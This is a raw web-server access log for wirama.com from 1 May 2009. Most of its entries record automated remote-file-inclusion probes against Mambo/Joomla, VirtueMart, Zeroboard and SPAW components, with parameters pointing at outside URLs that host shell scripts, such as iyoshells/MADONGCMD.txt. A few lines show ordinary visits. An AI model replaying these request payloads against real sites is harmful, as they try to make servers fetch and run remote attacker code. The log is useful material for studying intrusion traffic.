65.254.63.210 - - [01/May/2009:13:06:44 -0700] "GET /logs/access_090331.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:06:45 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:08:43 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.227.193.198 - - [01/May/2009:13:12:25 -0700] "GET /logs/access.log//bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.227.193.198 - - [01/May/2009:13:12:25 -0700] "GET /logs//bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.227.193.198 - - [01/May/2009:13:12:25 -0700] "GET /bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:13:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:13:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:13:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:18:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:18:03 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:18:03 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:23:56 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:23:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:23:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:26:05 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:26:05 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:26:06 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:26:26 -0700] "GET /logs/access_090401.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.57.79.26 - - [01/May/2009:13:27:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:27:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:27:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:28:00 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:28:01 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:28:01 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:29:26 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:29:27 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:29:27 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:13:30:00 -0700] "GET /logs/access_090301.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.227.193.198 - - [01/May/2009:13:37:00 -0700] "GET /logs/access.log%20%20//bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.227.193.198 - - [01/May/2009:13:37:00 -0700] "GET /bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.227.193.198 - - [01/May/2009:13:37:00 -0700] "GET /logs//bbs/skin/zero_vote/logout.php?dir=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.198.106.69 - - [01/May/2009:13:40:14 -0700] "GET /logs//?mosConfig_absolute_path=http://orkydeanera.altervista.org/simona/riky/albania.txt?? HTTP/1.1" 200 1950 "-" "libwww-perl/5.812" "wirama.com"
91.198.106.69 - - [01/May/2009:13:40:15 -0700] "GET /?mosConfig_absolute_path=http://orkydeanera.altervista.org/simona/riky/albania.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.812" "wirama.com"
91.198.106.69 - - [01/May/2009:13:40:15 -0700] "GET /logs//?mosConfig_absolute_path=http://orkydeanera.altervista.org/simona/riky/albania.txt?? HTTP/1.1" 200 1950 "-" "libwww-perl/5.812" "wirama.com"
91.198.106.69 - - [01/May/2009:13:40:15 -0700] "GET /?mosConfig_absolute_path=http://orkydeanera.altervista.org/simona/riky/albania.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.812" "wirama.com"
222.122.142.240 - - [01/May/2009:13:47:25 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:47:26 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:47:27 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:13:49:19 -0700] "GET /logs/access_090330.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.198.106.69 - - [01/May/2009:13:51:06 -0700] "GET /?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
91.198.106.69 - - [01/May/2009:13:51:11 -0700] "GET /logs/access_090401.log//?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.198.106.69 - - [01/May/2009:13:51:15 -0700] "GET /logs//?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1950 "-" "Mozilla/5.0" "wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:14:05:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
82.146.39.200 - - [01/May/2009:14:07:52 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [01/May/2009:14:07:53 -0700] "GET /spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [01/May/2009:14:08:37 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
82.146.39.200 - - [01/May/2009:14:08:37 -0700] "GET /spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
222.122.142.240 - - [01/May/2009:14:09:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.240 - - [01/May/2009:14:09:56 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
118.220.255.156 - - [01/May/2009:14:50:40 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:40 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:54 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:57 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:57 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:50:57 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:21 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:21 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:21 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:24 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:33 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:51:37 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.220.255.156 - - [01/May/2009:14:52:10 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:14:59:17 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:14:59:17 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:14:59:17 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:15:00:37 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:15:00:37 -0700] "GET /logs/access_090331.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:15:00:37 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:15:02:36 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.84.254 - - [01/May/2009:15:03:39 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.84.254 - - [01/May/2009:15:03:39 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.84.254 - - [01/May/2009:15:03:40 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:03:46 -0700] "GET /logs/access_090331.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:03:54 -0700] "GET /logs/access_090329.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:03:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:03:54 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:03:58 -0700] "GET /logs/access_090330.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:15:08:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:08:57 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:08:57 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:09:38 -0700] "GET /logs/access_090331.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:12:09 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:12:09 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:12:09 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [01/May/2009:15:12:23 -0700] "GET /logs/access_090401.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.116.84.254 - - [01/May/2009:15:13:39 -0700] "GET /logs/access_090331.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
84.54.137.9 - - [01/May/2009:15:23:54 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
84.54.137.9 - - [01/May/2009:15:23:54 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.116.84.254 - - [01/May/2009:15:24:44 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.116.84.254 - - [01/May/2009:15:24:44 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.116.84.254 - - [01/May/2009:15:24:45 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.116.84.254 - - [01/May/2009:15:28:25 -0700] "GET /logs/access_090331.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
189.173.25.83 - - [01/May/2009:15:42:29 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com.mx/search?hl=es&q=wirama+&btnG=Buscar&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
189.173.25.83 - - [01/May/2009:15:42:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
189.173.25.83 - - [01/May/2009:15:42:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
189.173.25.83 - - [01/May/2009:15:42:47 -0700] "GET / HTTP/1.1" 200 916 "http://www.tradevibes.com/company/profile/wirama" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
189.173.25.83 - - [01/May/2009:15:42:50 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
189.173.25.83 - - [01/May/2009:15:42:54 -0700] "GET /logs/ HTTP/1.1" 200 1945 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.wirama.com"
65.49.2.99 - - [01/May/2009:15:51:19 -0700] "GET /logs/errors.php?error=http://www.exotictravelasia.com/webalizer/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
65.49.2.99 - - [01/May/2009:15:51:19 -0700] "GET /errors.php?error=http://www.exotictravelasia.com/webalizer/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
202.62.61.45 - - [01/May/2009:15:57:04 -0700] "GET /logs/access.log/errors.php?error=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:15:57:05 -0700] "GET /errors.php?error=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:15:57:05 -0700] "GET /logs/errors.php?error=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
220.245.81.22 - - [01/May/2009:16:10:10 -0700] "GET /logs/access.log/errors.php?error=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
220.245.81.22 - - [01/May/2009:16:10:11 -0700] "GET /errors.php?error=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
